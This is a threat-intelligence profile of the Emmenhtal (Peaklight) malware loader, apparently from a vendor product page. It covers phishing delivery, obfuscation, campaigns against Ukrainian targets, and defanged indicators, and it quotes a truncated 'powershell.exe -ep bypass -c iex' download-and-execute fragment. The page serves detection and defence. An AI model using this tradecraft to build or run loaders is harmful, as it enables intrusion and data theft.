Emmenhtal
Emmenhtal is a multistage malware loader/downloader active since at least April 2024. It has also been referred to as Peaklight by Google/Mandiant, while some reporting uses the spelling “EmmenHTAl” specifically for its HTA component. It is used by financially motivated threat actors and has been observed in malware-as-a-service delivery chains to fetch and execute follow-on payloads including Amadey, SmokeLoader, commodity infostealers such as CryptBot and Lumma, and other stealers or RATs.
Reported delivery vectors include phishing emails and public GitHub repositories. In one campaign targeting Ukrainian entities, Talos assessed JavaScript files inside ZIP/7Zip/RAR phishing attachments as Emmenhtal; these used multiple layers of obfuscation to conceal a PowerShell downloader. Similar Emmenhtal samples were also hosted in public GitHub repositories and used to deliver Amadey. In another campaign targeting First Ukrainian International Bank (pumb[.]ua), a payment-themed phishing email delivered a 7z archive containing a lure PDF and an internet shortcut that downloaded a malicious LNK from 194[.]87[.]31[.]68:80. Execution triggered PowerShell and mshta, abused a modified DCCW.exe as a loader, and ran an HTA/JavaScript-based Emmenhtal stage that launched additional encoded PowerShell to download a lure PDF and a SmokeLoader payload into the user’s AppData directory. Network activity in that campaign also included 88[.]151[.]192[.]165.
Emmenhtal is characterized by heavy obfuscation and staged script execution. Observed techniques include layered JavaScript obfuscation, eval and charCode-style encoding, PowerShell with flags such as -w 1, -ep Unrestricted, and -nop, and LOLBAS use of mshta. A large sample delivered via KongTuke used more than 56,000 lines of junk mathematical operations, a 284 KB base64 byte array, and .NET reflection-based execution; ClamAV detects that sample as Win.Downloader.Emmenhtal-10044033-0. Emmenhtal has also been associated with polyglot-file tradecraft in malware campaigns.
The loader has been linked to campaigns targeting Ukrainian entities and has appeared in broader MaaS/TDS ecosystems. Cisco Talos reported a 2025 MaaS operation using Emmenhtal and Amadey, often leveraging fake public GitHub accounts such as Legendary99999, DFfe9ewf, and Milidmdds to stage payloads and scripts. Emmenhtal has also been observed as a downstream payload in KongTuke/404 TDS-style initial access chains. Known observables directly mentioned in reporting include pivqmane[.]com/testonload[.]mp4/, pivqmane[.]com/doc/fb[.]mp4, 194[.]87[.]31[.]68, and 88[.]151[.]192[.]165, as well as the SHA-256 e190ad0b45882fdd19e62883151803a32adb148e8eb7475f1b316a00d9ecc82f for an Emmenhtal sample.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
We observed a malicious campaign targeting First Ukrainian International Bank (pumb[.]ua) and noticed the usage of a stealthy malware loader known as Emmenhtal (sic! - this spelling refers to the HTA component of this loader, hence slightly unorthodox spelling "EmmenHTAl) also referred to by Google as Peaklight.
Techniques & procedures
12 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
5 techniques
Execution
The command uses ROT cipher or XOR obfuscation... powershell.exe -ep bypass -c iex ...
The execution of the JavaScript and PowerShell script resulted in the download and execution of SmokeLoader on the victim system.
Talos discovered another unique file on the “Milidmdds” GitHub account during this research — a malicious Python script named “checkbalance.py”.
IOCs tracked for this family
62 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Emmenhtal is referenced as a malware loader used to propagate Amadey.
A heavily obfuscated PowerShell loader/downloader that uses large amounts of junk math operations, embedded base64 byte arrays, XOR decoding, and .NET reflection-based execution to load and run a payload while evading static analysis and sandboxing.
A named malware used in a MaaS operation, linked in the content to threats against Ukrainian entities.
A loader used in a MaaS operation to deliver additional malicious payloads, leveraging public GitHub repositories as a distribution channel.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.